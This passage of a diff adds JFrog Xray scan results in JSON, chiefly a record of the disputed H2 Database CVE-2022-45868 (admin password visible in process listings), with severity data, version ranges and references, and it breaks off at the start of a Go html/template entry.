the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\"", + "issue_type": "security", + "provider": "JFrog", + "component": "com.h2database:h2", + "source_id": "gav://com.h2database:h2", + "source_comp_id": "gav://com.h2database:h2:2.1.214", + "component_versions": { + "id": "com.h2database:h2", + "vulnerable_versions": [ + "< 2.2.220" + ], + "fixed_versions": [ + "2.2.220" + ], + "more_details": { + "cves": [ + { + "cve": "CVE-2022-45868", + "cwe": [ + "CWE-200", + "CWE-312" + ], + "cvss_v3": "7.8/CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "description": "** DISPUTED ** The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\"", + "provider": "JFrog" + } + }, + "edited": "2023-01-08T19:24:00Z", + "is_source_root": false, + "is_high_profile": true, + "high_profile_info": { + "Id": 0, + "PublicVulnsTblID": 0, + "VulnId": "XRAY-261922", + "VulnerabilityTitle": "", + "ShortDescription": "(Non-issue) Incorrect usage of the H2 Database Engine may result in password leakage for the H2 Console.", + "FullDescription": "[h2database](https://github.com/h2database/h2database) is an open-source lightweight Java Database. H2 Database supports standard database APIs such as SQL and JDBC API. The H2 Database can also be used in embedded and server modes. H2 Database has a web-based admin console that can be initialized via the CLI. The console is accessible via tool options that are declared by the H2 Database. \n\nThe H2 console supports the `-webAdminPassword` CLI argument which takes the web admin password as a value. Specifying this password in the CLI is unsafe since local attackers will be able to see the password in plain text when the process list is shown with the arguments used to run them.\n\nThis vulnerability is a non-issue since passing passwords via the CLI is a well-known bad practice, and does not relate specifically to the H2 Database Engine.", + "Impact": 4, + "VulnerabilityType": "Local privilege escalation", + "Resolution": "", + "ExtendedImpactReasons": [ + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "Name": "The issue has been disputed by the vendor", + "Description": "This vulnerability is a non-issue since passing passwords via the CLI is a well-known bad practice, and does not relate specifically to the H2 Database Engine.", + "IsPositive": 1, + "InsertOrder": 1 + } + ], + "ExtendedReferences": [ + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "RefType": "Technical Writeup", + "Title": "Vulnerability report + technical writeup", + "Url": "https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243?pli=1", + "InsertOrder": 1 + } + ], + "ExtendedRelatedVulns": null + }, + "component_physical_paths": [ + "sha256__2547a948987c670df3f6e9575f90adb629f64de0711765dee6fc4c615ee2d120.tar.gz/workspace/BOOT-INF/lib/h2-2.1.214.jar" + ] + }, + { + "id": "XRAY-531550", + "severity": "Medium", + "severity_source": "NVD", + "pkg_type": "go", + "summary": "The html/template package does not properly handle HTML-like \"\" comment tokens, nor hashbang \"#!\" comment tokens, in